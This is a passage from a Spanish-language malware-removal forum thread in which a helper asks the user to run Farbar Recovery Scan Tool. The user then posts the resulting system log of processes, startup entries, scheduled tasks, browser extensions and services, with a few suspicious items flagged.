en el 2º escaneo incorporé el sistema pero salté lo referente al Office 2019, paraa que no me lo dejara desactivado.
Hola
Vuelve a ejecutar Kaspersky y manda a cuarentena todo lo que detecte.
Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus
Descarga Farbar Recovery Scan Tool en el escritorio, seleccionando la versión adecuada para la arquitectura (32 o 64bits) de tu equipo. Como saber si Mi Windows es de 32 o 64 Bits ?.
- Ejecuta FRST.exe.
- En el mensaje de la ventana del Disclaimer, pulsamos Yes
- En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el proceso.
- Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.
Pon los dos reportes generados.
Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo(mas de 50.000 caracteres aprox.).
Un saludo
Hola Daniela te mando lo que indicaste, aclarando que Kaspersky no encontró nada:
Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 29-08-2020
Ejecutado por Hetitor (administrador) sobre TRABAJO (Micro-Star International Co., Ltd. MS-7C52) (02-09-2020 09:17:52)
Ejecutado desde C:\Users\Hetitor\Downloads\Programs
Perfiles cargados: Hetitor
Platform: Windows 10 Pro Versión 1903 18362.1016 (X64) Idioma: Español (México)
Navegador predeterminado: Opera
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Procesos (Lista blanca) =================
(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)
() [Archivo no firmado] C:\Program Files (x86)\Ditto\Ditto.exe
() [Archivo no firmado] H:\HECTOR\RocketDock\RocketDock.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0358376.inf_amd64_5021e78c919c39b0\B358374\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0358376.inf_amd64_5021e78c919c39b0\B358374\atiesrxx.exe
(Arvato Digital Services Canada Inc -> arvato digital services llc) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Avanquest North America Inc. -> ) H:\Utilitarios\PD8\ContextMenuServer.exe
(Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster) E:\Program Files (x86)\PCGameBoost\Smart Game Booster\4.5.0\SgbTray.exe
(FxSound, LLC -> ) [Archivo no firmado] C:\Program Files (x86)\DFX\dfx.exe
(FxSound, LLC -> ) C:\Program Files (x86)\DFX\Universal\Apps\DfxSharedApp32.exe
(FxSound, LLC -> ) C:\Program Files (x86)\DFX\Universal\Apps\DfxSharedApp64.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13110.41006.0_x64__8wekyb3d8bbwe\commsapps.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13110.41006.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12008.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.) C:\Windows\System32\amdfendrsr.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\UTILITARIOS\Mozilla Thunderbird\thunderbird.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(Tonec Inc. -> Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc. -> Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
==================== Registro (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)
HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\RtkAudUService64.exe [1098480 2020-06-23] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [FxSound Enhancer] => C:\Program Files (x86)\DFX\dfx.exe [1780728 2019-07-26] (FxSound, LLC -> ) [Archivo no firmado]
HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\Run: [Ditto] => C:\Program Files (x86)\Ditto\Ditto.exe [2479104 2017-09-05] () [Archivo no firmado]
HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\Run: [RocketDock] => H:\HECTOR\RocketDock\RocketDock.exe [495616 2007-09-02] () [Archivo no firmado]
HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [5460280 2020-08-01] (Tonec Inc. -> Tonec Inc.)
HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\Run: [Opera Browser Assistant] => C:\Users\Hetitor\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [3126296 2020-08-31] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\ssText3d.scr [221184 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe [2020-08-19] (Google LLC -> Google LLC)
CHR HKLM\SOFTWARE\Policies\Google: Restricción <==== ATENCIÓN
==================== Tareas programadas (Lista blanca) ============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
Task: {02BE6975-029C-44BE-BE5B-77FBA46C1CCF} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-07-11] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {0D608E80-8841-417A-AA43-CCB6CA8435B1} - System32\Tasks\SmartGameBooster Startup => E:\Program Files (x86)\PCGameBoost\Smart Game Booster\4.5.0\SgbTray.exe [1607736 2020-07-10] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)
Task: {1BF2F865-12D5-487F-84DE-0706E0DD679F} - System32\Tasks\CCleanerSkipUAC => E:\Program Files\CCleaner\CCleaner.exe [24770744 2020-08-05] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {2666EB66-2E48-49E2-945D-C34817BB138B} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [155488 2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {28A463F0-5D51-4DF9-AAE5-EF851476C421} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2020-07-11] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {34DBCEF4-4738-41CE-8FE4-DE2D5ACE28D2} - System32\Tasks\DownloadStudio Standalone Updater => C:\Program Files (x86)\Download Studio\dstudio-gui.exe [5230 2020-08-29] () [Archivo no firmado]
Task: {4563D4CA-83F8-4A93-B99B-43F99C490809} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\Hetitor\Downloads\Programs\esetonlinescanner.exe [14860896 2020-08-29] (ESET, spol. s r.o. -> ESET spol. s r.o.)
Task: {4C83A8B9-8D0A-4C59-B135-05BC949A368B} - System32\Tasks\Opera scheduled Autoupdate 1598966736 => C:\Users\Hetitor\AppData\Local\Programs\Opera\launcher.exe [1529880 2020-08-31] (Opera Software AS -> Opera Software)
Task: {71EB540F-D0CE-4D88-8AAA-78AAF5D34837} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5725080 2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {90826942-4C7B-4A87-ADDF-EA4F1CDB458C} - System32\Tasks\Opera scheduled assistant Autoupdate 1598966741 => C:\Users\Hetitor\AppData\Local\Programs\Opera\launcher.exe [1529880 2020-08-31] (Opera Software AS -> Opera Software)
Task: {94CA0557-F8AD-4993-923C-1247F4D512B0} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23819120 2020-08-05] (Microsoft Corporation -> Microsoft Corporation)
Task: {A511E049-CF74-4136-8F36-117A9E574EE7} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1627648 2020-07-11] (Advanced Micro Devices, Inc.) [Archivo no firmado]
Task: {C35B95F6-9BBB-419F-A537-CFCD737434DD} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\Hetitor\Downloads\Programs\esetonlinescanner.exe [14860896 2020-08-29] (ESET, spol. s r.o. -> ESET spol. s r.o.)
Task: {C50FB83D-7EF5-4476-8151-2A35B2455D9A} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23819120 2020-08-05] (Microsoft Corporation -> Microsoft Corporation)
Task: {D1717EF2-ADB4-4E16-B0FE-4414C22023C3} - System32\Tasks\NvNgxUpdateCheckDaily_{2A68F03E-F03E-F03E-F03E-2A68F03EF03E} => C:\Users\Hetitor\AppData\Roaming\arjabwr.exe <==== ATENCIÓN
Task: {D2E103A8-EF44-4AC3-B1A4-1C223D819986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {D7C1DC2D-38D0-4986-A079-22902BE3FEB6} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [1706496 2020-08-05] () [Archivo no firmado]
Task: {D8E95D36-A538-472F-83CA-9DA7734B21F2} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [155488 2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {DA936D3B-AC30-45C9-9D1A-4FDAC63CFA50} - System32\Tasks\ASC_PerformanceMonitor => E:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [3183888 2020-06-01] (IObit Information Technology -> IObit)
Task: {EAEEF042-1A22-4180-A3AA-D4AB6700D04C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5725080 2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {F5F081E0-6F2E-4509-BF8E-8D85958BAB25} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1627648 2020-07-11] (Advanced Micro Devices, Inc.) [Archivo no firmado]
Task: {FF75E2E9-9613-494D-922E-C1ECA00E959C} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1627648 2020-07-11] (Advanced Micro Devices, Inc.) [Archivo no firmado]
(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)
==================== Internet (Lista blanca) ====================
(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)
Tcpip\Parameters: [DhcpNameServer] 200.49.130.52 200.42.4.199
Tcpip\..\Interfaces\{c971d8ab-7c0a-4447-b6a5-d69135873033}: [DhcpNameServer] 200.49.130.52 200.42.4.199
Internet Explorer:
==================
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2020-07-31] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2020-07-31] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
Edge:
======
Edge Extension: (IDM Integration Module) -> EdgeExtension_TonecIncIDMIntegrationModule_e7b5mm5d3r6v2 => C:\Program Files\WindowsApps\TonecInc.IDMIntegrationModule_6.38.2.0_neutral__e7b5mm5d3r6v2 [2020-08-16]
Edge Profile: C:\Users\Hetitor\AppData\Local\Microsoft\Edge\User Data\Default [2020-08-31]
Edge Extension: (IDM Integration Module) - C:\Users\Hetitor\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\llbjbkhnmlidjebalopleeepgdfgcpec [2020-08-22]
Edge HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\Microsoft\Edge\Extensions\...\Edge\Extension: [llbjbkhnmlidjebalopleeepgdfgcpec] - C:\Program Files (x86)\Internet Download Manager\IDMEdgeExt.crx [2020-08-01]
FireFox:
========
FF HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\Hetitor\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Hetitor\AppData\Roaming\IDM\idmmzcc5 [2020-08-16] [Heredado] [no firmado]
FF HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Heredado]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2020-08-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=3.0.11 -> C:\Multimediales\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
Chrome:
=======
CHR Profile: C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default [2020-09-01]
CHR Notifications: Default -> hxxps://web.whatsapp.com; hxxps://www.facebook.com; hxxps://www.youtube.com
CHR HomePage: Default -> hxxp://www.google.com.ar/
CHR StartupUrls: Default -> "hxxp://www.google.com.ar/"
CHR Extension: (Google Drive) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-08-16]
CHR Extension: (Video Downloader professional) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\bacakpdjpomjaelpkpkabmedhkoongbi [2020-09-01]
CHR Extension: (Pop up blocker for Chrome™ - Poper Blocker) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkkbcggnhapdmkeljlodobbkopceiche [2020-08-16]
CHR Extension: (YouTube) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-08-16]
CHR Extension: (OneTab) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\chphlpgkkbolifaimnlloiipkdnihall [2020-08-27]
CHR Extension: (Search by Image (by Google)) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\dajedkncpodkggklbegccjpmnglmnflm [2020-08-16]
CHR Extension: (Extensión Web de Dragon) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ddaloccgjfibfpkalenodgehlhkgoahe [2020-08-16]
CHR Extension: (Avast Passwords) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\emhginjpijfggbofeediiojmdlmlkoik [2020-08-16]
CHR Extension: (Causality Games) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\femoooemgmjaebeodbbikbkmhlafenpl [2020-08-16]
CHR Extension: (Cablevisión Flow) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfbnbmbkemlokfckhdoaakhjogffkinc [2020-08-16]
CHR Extension: (AdBlock: el mejor bloqueador de anuncios) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-08-16]
CHR Extension: (AirDroid) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\hkgndiocipalkpejnpafdbdlfdjihomd [2020-08-16]
CHR Extension: (Cut the Rope) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfbadlndcminbkfojhlimnkgaackjmdo [2020-08-16]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2020-08-20]
CHR Extension: (Video DownloadHelper) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2020-09-01]
CHR Extension: (AirDroid Remote Control Plugin) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\macmgoeeggnlnmpiojbcniblabkdjphe [2020-08-16]
CHR Extension: (Flashcontrol) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfidmkgnfgnkihnjeklbekckimkipmoe [2020-09-01]
CHR Extension: (Into The Mist) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgihmkgobaljfehcadcckdggpeojaadh [2020-08-16]
CHR Extension: (Juego de Golf WGT) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpedbpkelbhcbkdaglillalioeeekbpb [2020-08-16]
CHR Extension: (IDM Integration Module) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2020-08-16]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-08-16]
CHR Extension: (Gmail) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-08-16]
CHR Extension: (Chrome Media Router) - C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-08-16]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-08-01]
CHR HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-08-01]
Opera:
=======
OPR Notifications: hxxps://calendar.google.com; hxxps://web.whatsapp.com; hxxps://www.facebook.com; hxxps://www.youtube.com
OPR StartupUrls: "hxxp://www.google.com.ar/"
OPR Extension: (Aliexpress Tool) - C:\Users\Hetitor\AppData\Roaming\Opera Software\Opera Stable\Extensions\ggdijglkmhahncenoalecbegchgdffbg [2020-08-30]
OPR Extension: (ImTranslator: Translator, Dictionary, TTS) - C:\Users\Hetitor\AppData\Roaming\Opera Software\Opera Stable\Extensions\glaedmooikiamindhmfcfccncmmdagge [2020-08-27]
OPR Extension: (Side Calculator) - C:\Users\Hetitor\AppData\Roaming\Opera Software\Opera Stable\Extensions\kfdfpgeiehibehpmgjnkekpenkkfajlj [2020-08-25]
OPR Extension: (Speed Dial [FVD] - New Tab Page, 3D, Sync...) - C:\Users\Hetitor\AppData\Roaming\Opera Software\Opera Stable\Extensions\pncpfofkienlinhfknpmgjnjhdoclfhh [2020-08-25]
==================== Servicios (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [10566536 2020-08-05] (Microsoft Corporation -> Microsoft Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7138296 2020-08-24] (Malwarebytes Inc -> Malwarebytes)
R2 PSI_SVC_2; c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe [277360 2014-04-30] (Arvato Digital Services Canada Inc -> arvato digital services llc)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6149984 2020-08-17] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.4-0\NisSrv.exe [2343128 2020-08-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.4-0\MsMpEng.exe [128376 2020-08-16] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 wuauserv; C:\Windows\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 wuauserv; C:\Windows\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 KMS-R@1n; C:\Windows\[email protected] [X]
S2 SecurityServiceMonitor; "C:\Program Files (x86)\TotalAV\SecurityService.exe" --monitor [X] <==== ATENCIÓN
===================== Controladores (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
R3 AMDXE; C:\Windows\System32\drivers\amdxe.sys [62056 2020-08-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 ampa; C:\Windows\system32\ampa.sys [38320 2017-02-28] (CHENGDU AOMEI Tech Co., Ltd. -> )
S3 cpuz145; C:\Windows\temp\cpuz145\cpuz145_x64.sys [49968 2020-09-02] (CPUID -> CPUID)
S3 ddmdrv; C:\Windows\system32\ddmdrv.sys [35760 2016-12-27] (CHENGDU AOMEI Tech Co., Ltd. -> )
S3 DFX11_1; C:\Windows\system32\drivers\dfx11_1x64.sys [28008 2018-03-08] (Power Technology -> Windows (R) Win 7 DDK provider)
R3 DFX12; C:\Windows\system32\drivers\dfx12x64.sys [39048 2018-03-08] (Power Technology -> Windows (R) Win 7 DDK provider)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [217088 2020-09-02] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [19912 2020-08-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248968 2020-08-24] (Malwarebytes Inc -> Malwarebytes)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [48536 2020-08-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [428272 2020-08-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [69872 2020-08-16] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
==================== Un mes (creado) ===================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-09-02 09:17 - 2020-09-02 09:18 - 000000000 ____D C:\FRST
2020-09-02 09:16 - 2020-09-02 09:16 - 000000000 ____D C:\Users\Hetitor\AppData\LocalLow\IGDump
2020-09-02 09:11 - 2020-09-02 09:11 - 000217088 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2020-09-02 09:06 - 2020-09-02 09:06 - 001048416 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll
2020-09-02 09:06 - 2020-09-02 09:06 - 001048416 _____ C:\Windows\system32\vulkan-1.dll
2020-09-02 09:06 - 2020-09-02 09:06 - 000910872 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll
2020-09-02 09:06 - 2020-09-02 09:06 - 000910872 _____ C:\Windows\SysWOW64\vulkan-1.dll
2020-09-02 09:06 - 2020-09-02 09:06 - 000020408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\detoured.dll
2020-09-02 09:06 - 2020-09-02 09:06 - 000020408 _____ (Microsoft Corporation) C:\Windows\system32\detoured.dll
2020-09-02 09:06 - 2020-09-02 09:06 - 000000000 ____D C:\Windows\LastGood.Tmp
2020-09-02 09:05 - 2020-09-02 09:05 - 001754336 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe
2020-09-02 09:05 - 2020-09-02 09:05 - 001754336 _____ C:\Windows\system32\vulkaninfo.exe
2020-09-02 09:05 - 2020-09-02 09:05 - 001360096 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2020-09-02 09:05 - 2020-09-02 09:05 - 001360096 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2020-09-02 09:05 - 2020-09-02 09:05 - 000121056 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2020-09-01 23:20 - 2020-09-01 23:22 - 000985093 _____ C:\Users\Hetitor\Desktop\Wiper soft 1920.txt
